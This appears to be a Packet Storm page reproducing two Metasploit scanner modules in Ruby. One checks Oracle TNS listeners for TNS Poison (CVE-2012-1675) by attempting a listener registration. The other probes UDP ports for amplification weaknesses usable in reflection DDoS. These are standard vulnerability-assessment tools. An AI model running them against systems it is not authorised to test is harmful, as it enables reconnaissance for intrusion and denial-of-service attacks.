    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  include Msf::Exploit::Remote::TNS  def initialize(info = {})    super(update_info(info,      'Name'           => 'Oracle TNS Listener Checker',      'Description'    => %q{        This module checks the server for vulnerabilities like TNS Poison.        Module sends a server a packet with command to register new TNS Listener and checks        for a response indicating an error. If the registration is errored, the target is not        vulnerable. Otherwise, the target is vulnerable to malicious registrations.      },      'Author'         => ['ir0njaw (Nikita Kelesis) <nikita.elkey[at]gmail.com>'], # of Digital Security [http://dsec.ru]      'References'     =>        [          [ 'CVE', '2012-1675'],          [ 'URL', 'https://seclists.org/fulldisclosure/2012/Apr/204' ],        ],      'DisclosureDate' => '2012-04-18',      'License'        => MSF_LICENSE))    register_options(      [        Opt::RPORT(1521)      ])  end  def run_host(ip)    begin      connect      send_packet = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))")      sock.put(send_packet)      packet = sock.read(100)      if packet        hex_packet = Rex::Text.to_hex(packet, ':')        split_hex = hex_packet.split(':')        find_packet = /\(ERROR_STACK=\(ERROR=/ === packet        if find_packet == true #TNS Packet returned ERROR          print_error("#{ip}:#{rport} is not vulnerable")        elsif split_hex[5] == '02' #TNS Packet Type: ACCEPT          print_good("#{ip}:#{rport} is vulnerable")        elsif split_hex[5] == '04' #TNS Packet Type: REFUSE          print_error("#{ip}:#{rport} is not vulnerable")        else #All other TNS packet types or non-TNS packet type response cannot guarantee vulnerability          print_error("#{ip}:#{rport} might not be vulnerable")        end      else        print_error("#{ip}:#{rport} is not vulnerable")      end      # TODO: Module should report_vuln if this finding is solid.      rescue ::Rex::ConnectionError, ::Errno::EPIPE      print_error("#{ip}:#{rport} unable to connect to the server")    end  endend

Oracle TNS Listener Checker

Detect UDP endpoints with UDP amplification vulnerabilities.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::DRDoS  include Msf::Auxiliary::Report  include Msf::Auxiliary::UDPScanner  def initialize    super(      'Name'        => 'UDP Amplification Scanner',      'Description' => 'Detect UDP endpoints with UDP amplification vulnerabilities',      'Author'      => 'Jon Hart <jon_hart[at]rapid7.com>',      'License'     => MSF_LICENSE,      'References'  =>        [          ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-017A']        ]    )    register_options(      [        OptString.new('PORTS', [true, 'Ports to probe']),        OptString.new('PROBE', [false, 'UDP payload/probe to send.  Unset for an empty UDP datagram, or the `file://` resource to get content from a local file'])      ]    )    # RPORT is unused in this scanner module because it supports multiple ports    deregister_options('RPORT')  end  def setup    super    unless (@ports = Rex::Socket.portspec_crack(datastore['PORTS']))      fail_with(Failure::BadConfig, "Unable to extract list of ports from #{datastore['PORTS']}")    end    @probe = datastore['PROBE'] ? datastore['PROBE'] : ''  end  def scanner_prescan(batch)    print_status("Sending #{@probe.length}-byte probes to #{@ports.length} port(s) on #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")    @results ||= {}  end  def scan_host(ip)    @ports.each do |port|      scanner_send(@probe, ip, port)    end  end  # Called for each response packet, overriding UDPScanner's so that we can  # store all responses on a per-host, per-port basis  def scanner_process(data, shost, sport)    @results[shost] ||= {}    @results[shost][sport] ||= []    @results[shost][sport] << data  end  def scanner_postscan(batch)    batch.each do |shost|      next unless @results.key?(shost)      @results[shost].each_pair do |sport, responses|        report_service(host: shost, port: sport, proto: 'udp', info: responses.inspect, state: 'open')        vulnerable, proof = prove_amplification(@probe => responses)        next unless vulnerable        print_good("#{shost}:#{sport} - susceptible to UDP amplification: #{proof}")        report_vuln(          host: shost,          port: sport,          proto: 'udp',          name: 'UDP amplification',          refs: references        )      end    end  endend

Source

Packet Storm